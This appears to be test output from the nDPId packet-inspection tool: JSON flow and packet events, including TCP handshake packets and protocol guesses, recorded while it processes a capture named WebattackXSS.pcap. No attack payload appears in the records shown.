-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1499347057628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347057628,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0yDJAAD4G\/aWsEAABwKgKMs+uAFAuuffxtobmJYAQAOUVgAAAAQEICgE5P8ID4xE4"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347060176,"flow_last_seen":1499347060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347060176,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1499347060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347060176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TeFAAD4Gd++sEAABwKgKMs\/IAFAgqg\/fAAAAAKACchAa6wAAAgQFtAQCCAoBOUI+AAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1499347060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347060176,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz8g7I8+hIKoP4KAScSD5bAAAAgQFtAQCCAoD4xO1ATlCPgEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1499347060177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347060177,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TeJAAD4Gd\/asEAABwKgKMs\/IAFAgqg\/gOyPPooAQAOWYcwAAAQEICgE5Qj8D4xO1"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347061452,"flow_last_seen":1499347061452,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347061452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1499347061452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347061452,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89\/VAAD4GzdqsEAABwKgKMs\/WAFCNxbSIAAAAAKACchAH2QAAAgQFtAQCCAoBOUN9AAAAAAEDAwc="} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1499347061452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347061452,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz9aoZTRrjcW0iaAScSATEAAAAgQFtAQCCAoD4xT0ATlDfQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":814,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1499347061452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347061452,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09\/ZAAD4GzeGsEAABwKgKMs\/WAFCNxbSJqGU0bIAQAOWyFgAAAQEICgE5Q34D4xT0"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347062740,"flow_last_seen":1499347062740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347062740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1499347062740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347062740,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/9NAAD4GxfysEAABwKgKMs\/kAFBs1rtsAAAAAKACchAglAAAAgQFtAQCCAoBOUS\/AAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1499347062740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347062740,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz+TKmKvobNa7baAScSCQ2AAAAgQFtAQCCAoD4xY2ATlEvwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1499347062741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347062741,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/9RAAD4GxgOsEAABwKgKMs\/kAFBs1rttypir6YAQAOUv3wAAAQEICgE5RMAD4xY2"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347065288,"flow_last_seen":1499347065288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347065288,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1499347065288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347065288,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8t0lAAD4GDoesEAABwKgKMs\/+AFBdePB1AAAAAKACchD4UQAAAgQFtAQCCAoBOUc8AAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1499347065288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347065288,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz\/602CZHXXjwdqAScSABewAAAgQFtAQCCAoD4xizATlHPAEDAwc="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1499347065288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347065288,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0t0pAAD4GDo6sEAABwKgKMs\/+AFBdePB2tNgmSIAQAOWggQAAAQEICgE5Rz0D4xiz"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347066560,"flow_last_seen":1499347066560,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347066560,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1499347066560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347066560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zkNAAD4G94ysEAABwKgKMtAMAFBP5YY5AAAAAKACchBu1QAAAgQFtAQCCAoBOUh6AAAAAAEDAwc="} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1499347066560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347066560,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0Ax\/i5rPT+WGOqAScSA3hQAAAgQFtAQCCAoD4xnxATlIegEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":856,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1499347066560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347066560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zkRAAD4G95OsEAABwKgKMtAMAFBP5YY6f4ua0IAQAOXWiwAAAQEICgE5SHsD4xnx"} -00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1499346935283,"flow_last_seen":1499346941359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7240,"flow_tot_l4_payload_len":15748,"flow_avg_l4_payload_len":524,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935343,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935343,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52118,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52120,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347069146,"flow_last_seen":1499347069146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347069146,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53286,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1499347069146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347069146,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8xkJAAD4G\/42sEAABwKgKMtAmAFBk4I1DAAAAAKACchBQLwAAAgQFtAQCCAoBOUsBAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1499347069146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347069146,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0CYp21tPZOCNRKAScSCriAAAAgQFtAQCCAoD4xx4ATlLAQEDAwc="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":877,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1499347069147,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347069147,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0xkNAAD4G\/5SsEAABwKgKMtAmAFBk4I1EKdtbUIAQAOVKkAAAAQEICgE5SwED4xx4"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347070422,"flow_last_seen":1499347070422,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347070422,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1499347070422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347070422,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83flAAD4G59asEAABwKgKMtA0AFCnyZG5AAAAAKACchAHgwAAAgQFtAQCCAoBOUxAAAAAAAEDAwc="} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1499347070422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347070422,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0DQuPoKZp8mRuqAScSA18AAAAgQFtAQCCAoD4x23ATlMQAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1499347070423,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347070423,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03fpAAD4G592sEAABwKgKMtA0AFCnyZG6Lj6CmoAQAOXU9wAAAQEICgE5TEAD4x23"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":899,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347071685,"flow_last_seen":1499347071685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347071685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1499347071685,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347071685,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gQZAAD4GRMqsEAABwKgKMtBCAFDUJMx6AAAAAKACchCfHAAAAgQFtAQCCAoBOU18AAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1499347071686,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347071686,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0EJ9MmhQ1CTMe6AScSCXogAAAgQFtAQCCAoD4x7zATlNfAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1499347071686,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347071686,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gQdAAD4GRNGsEAABwKgKMtBCAFDUJMx7fTJoUYAQAOU2qgAAAQEICgE5TXwD4x7z"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347074268,"flow_last_seen":1499347074268,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347074268,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1499347074268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347074268,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NBxAAD4GkbSsEAABwKgKMtBcAFD4fmQdAAAAAKACchDggAAAAgQFtAQCCAoBOVABAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":915,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1499347074268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347074268,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0Fw80cpV+H5kHqAScSC03QAAAgQFtAQCCAoD4yF4ATlQAQEDAwc="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1499347074269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347074269,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NB1AAD4GkbusEAABwKgKMtBcAFD4fmQePNHKVoAQAOVT5AAAAQEICgE5UAID4yF4"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":926,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347075596,"flow_last_seen":1499347075596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347075596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":926,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1499347075596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347075596,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KAdAAD4GncmsEAABwKgKMtBqAFA4KXlJAAAAAKACchCKTwAAAgQFtAQCCAoBOVFOAAAAAAEDAwc="} 
